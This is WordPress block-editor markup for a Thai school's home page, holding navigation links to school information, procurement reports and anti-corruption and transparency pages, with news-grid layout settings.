wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{